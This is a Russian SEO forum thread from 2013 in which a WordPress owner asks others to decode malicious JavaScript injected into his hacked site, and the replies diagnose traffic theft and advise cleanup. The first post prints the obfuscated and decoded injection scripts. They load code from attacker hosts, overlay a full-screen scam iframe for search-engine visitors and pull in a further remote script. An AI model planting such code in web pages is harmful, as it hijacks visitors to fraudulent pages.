Помогите расшифровать код

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Веб-строительство > Программная часть

Помогите расшифровать код

Опции

ERSEO

Topic Starter сообщение

27.6.2013, 21:19; Ответить: ERSEO

Сообщение #1

Бывалый

Группа: User
Сообщений: 465
Регистрация: 15.6.2011
Из: Москва
Поблагодарили: 21 раз
Репутация:

На сайте обнаружил вирусный файл, некий DownloadAcceleratorSetup в формате приложения (программы). Когда я попытался открыть его на компьютере, то появилось окно "какой программой открыть" и началась какая-то загрузка. Не стандартное окно загрузки, как установка программ.

С сайта я эту программу я удалил, но заметил еще пару вещей:
когда я открыл сайт, фоном заиграла аудиозапись. Вроде звуковая дорожка из мультфильма алеша попович или что-то вроде того. Как будто кто-то таким образом накручивал просмотры на youtube.com. Далее я нашел у себя в коде сайта такой скрипт

document.write(unescape('<script%20%73%72%63%3D%68%74%74%70%3A%2F%2F%72%65%76%69%65%77%68%6F%61%78%2E%63%6F%6D%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%70%6F%6D%6F%2F%2E%62%61%63%6B%75%70%2F%2E%73%63%72%69%70%74%2E%6A%73%20%74%79%70%65%3D%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%3E%3C%2F%73%63%72%69%70%74%3E'));

В декодере Лебедева http://www.artlebedev.ru/tools/decoder/ мне этот код перевело, как

document.write(unescape('<script src=http://reviewhoax.com/wp-includes/pomo/.backup/.script.js type=text/javascript></script>'));

Я перешел на сайт из этого кода http://reviewhoax.com/wp-includes/pomo/.backup/.script.js и обнаружил такой скрипт:

var refarray = new Array();
refarray["google."] = "1";
refarray["bing."] = "2";
refarray["yandex."] = "3";
refarray["rambler."] = "4";
refarray["mail."] = "5"
for (var i in refarray) {
if (document.referrer.indexOf(i) != -1) document.write(unescape('%3C%73%74%79%6C%65%3E%0A%42%4F%44%59%20%7B%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%7D%0A%3C%2F%73%74%79%6C%65%3E%0A%3C%69%66%72%61%6D%65%20%73%74%79%6C%65%3D%22%7A%2D%69%6E%64%65%78%3A%32%31%34%37%34%38%33%36%34%37%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%68%65%69%67%68%74%3A%31%30%30%25%3B%77%69%64%74%68%3A%31%30%30%25%3B%6C%65%66%74%3A%30%70%78%3B%74%6F%70%3A%30%70%78%3B%62%6F%72%64%65%72%3A%30%70%78%3B%22%20%77%69%64%74%68%3D%22%31%30%30%25%22%20%68%65%69%67%68%74%3D%22%31%30%30%25%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%65%76%69%65%77%68%6F%61%78%2E%63%6F%6D%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%70%6F%6D%6F%2F%2E%62%61%63%6B%75%70%2F%2E%64%6F%62%72%6F%2E%68%74%6D%6C%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
}

document.write(unescape('<script%20%6C%61%6E%67%75%61%67%65%3D%4A%61%76%61%53%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%62%6E%65%77%73%74%61%74%73%2E%64%79%6E%64%6E%73%2E%69%6E%66%6F%2F%69%6E%66%6F%62%2E%70%68%70%3F%69%3D%32%32%35%31%36%3E%3C%2F%73%63%72%69%70%74%3E'));

Часть кода я так же решил расшифровать в декодере, а именно вот эту часть

if (document.referrer.indexOf(i) != -1) document.write(unescape('%3C%73%74%79%6C%65%3E%0A%42%4F%44%59%20%7B%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%7D%0A%3C%2F%73%74%79%6C%65%3E%0A%3C%69%66%72%61%6D%65%20%73%74%79%6C%65%3D%22%7A%2D%69%6E%64%65%78%3A%32%31%34%37%34%38%33%36%34%37%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%68%65%69%67%68%74%3A%31%30%30%25%3B%77%69%64%74%68%3A%31%30%30%25%3B%6C%65%66%74%3A%30%70%78%3B%74%6F%70%3A%30%70%78%3B%62%6F%72%64%65%72%3A%30%70%78%3B%22%20%77%69%64%74%68%3D%22%31%30%30%25%22%20%68%65%69%67%68%74%3D%22%31%30%30%25%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%65%76%69%65%77%68%6F%61%78%2E%63%6F%6D%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%70%6F%6D%6F%2F%2E%62%61%63%6B%75%70%2F%2E%64%6F%62%72%6F%2E%68%74%6D%6C%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
}

document.write(unescape('<script%20%6C%61%6E%67%75%61%67%65%3D%4A%61%76%61%53%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%62%6E%65%77%73%74%61%74%73%2E%64%79%6E%64%6E%73%2E%69%6E%66%6F%2F%69%6E%66%6F%62%2E%70%68%70%3F%69%3D%32%32%35%31%36%3E%3C%2F%73%63%72%69%70%74%3E'));

И вот, что получилось

document.write(unescape('<style>
BODY {overflow: hidden}
</style>
<iframe style="z-index:2147483647;position:absolute;height:100%;width:100%;left:0px;top:0px;border:0px;" width="100%" height="100%" src="http://reviewhoax.com/wp-includes/pomo/.backup/.dobro.html" frameborder="0"></iframe>'));
}

document.write(unescape('<script language=JavaScript src=http://bbnewstats.dyndns.info/infob.php?i=22516></script>'));

Вообщем. Помогите разобраться, что это такое вообще.
CMS Wordpress

П.С. кажется догадался. Ссылка, указанная в коде, ведет на сайт http://reviewhoax.com/wp-includes/pomo/.backup/.dobro.html, т.е. обман пользователей и как я понял показывается один раз.

--------------------

Имеются инвайты в PROFITRAF - напишите в ЛС о ваших сайтах.

Ответить с цитированием данного сообщения

kagtus kagtus 28.6.2013, 0:12; Сообщений: 421 Поблагодарили: 95 раз Репутация: 22 Просмотр профиля	28.6.2013, 0:12; Ответить: kagtus Сообщение #2
Бывалый Группа: User Сообщений: 421 Регистрация: 11.10.2012 Из: Kostroma Поблагодарили: 95 раз Репутация: 22	вас взломали и воруют трафик -------------------- ася 45два48499два удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ

ERSEO Topic Starter ERSEOTopic Starter 28.6.2013, 0:52; Сообщений: 465 Поблагодарили: 21 раз Репутация: 2 Просмотр профиля	Topic Starter 28.6.2013, 0:52; Ответить: ERSEO Сообщение #3
Бывалый Группа: User Сообщений: 465 Регистрация: 15.6.2011 Из: Москва Поблагодарили: 21 раз Репутация: 2	kagtus, сейчас удалил этот код. -------------------- Имеются инвайты в PROFITRAF - напишите в ЛС о ваших сайтах.

kagtus kagtus 28.6.2013, 6:40; Сообщений: 421 Поблагодарили: 95 раз Репутация: 22 Просмотр профиля	28.6.2013, 6:40; Ответить: kagtus Сообщение #4
Бывалый Группа: User Сообщений: 421 Регистрация: 11.10.2012 Из: Kostroma Поблагодарили: 95 раз Репутация: 22	это только следствие проблемы, а теперь ищи причину, обновляй движок и плагины (если еще несделано), "ай-болит" в помощь, затем меняй все пароли... Сообщение отредактировал kagtus - 28.6.2013, 6:45 -------------------- ася 45два48499два удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ

KipiaSoft KipiaSoft 28.6.2013, 6:52; Сообщений: 2096 Поблагодарили: 632 раза Репутация: 74 Просмотр профиля	28.6.2013, 6:52; Ответить: KipiaSoft Сообщение #5
Старожил Группа: Active User Сообщений: 2096 Регистрация: 16.11.2009 Из: Волгоград Поблагодарили: 632 раза Репутация: 74	(ERSEO @ 27.6.2013, 21:19) Вообщем. Помогите разобраться, что это такое вообще. Вас взломали и нужно разбираться не что это такое, а каким образом это попало на сайт и закрывать всевозможные дыры -------------------- Шустрый хостинг для WP! вистерия ант ди Поблагодарили: (1) Electric

Electric

29.6.2013, 8:43; Ответить: Electric

Сообщение #6

CMS help/antivirus

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 400 раз
Репутация:

Ищите на сайте шеллы и вредоносные коды в шаблонах (и не только). Только удалив все гадости вы избавитесь от этого. Иначе все будет повторяться...

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой

или обратитесь к любому из модераторов.

--------------------

Чистка от вирусов. Sape. CMS, плагины, моды, темы.
НесТ@ндАртнЫе решения.
[VK][FB][TW][LJ][G+]

« Предыдущая тема · Программная часть · Следующая тема »

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Помогите вспомнить рекламного бота Телеграм для обмена рекламой	0	Mixatraider	723	21.2.2024, 23:42 автор: Mixatraider
Почистить код на сайте	1	Timka	1104	2.1.2021, 1:13 автор: 0pium
Помогите рещить проблему с монитором. Почему низкое разрешение при подключении монитора через displayport?	0	Levels	1701	11.12.2020, 0:48 автор: Levels
Вы мне код, я вам как - делать не надо.	0	fedornabilkin	957	18.9.2020, 18:59 автор: fedornabilkin
Помогите кто нибудь получить партнерку Росбанк!	7	heisenberg_mw	2339	7.8.2020, 9:28 автор: heisenberg_mw

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 16.4.2024, 22:16

Дизайн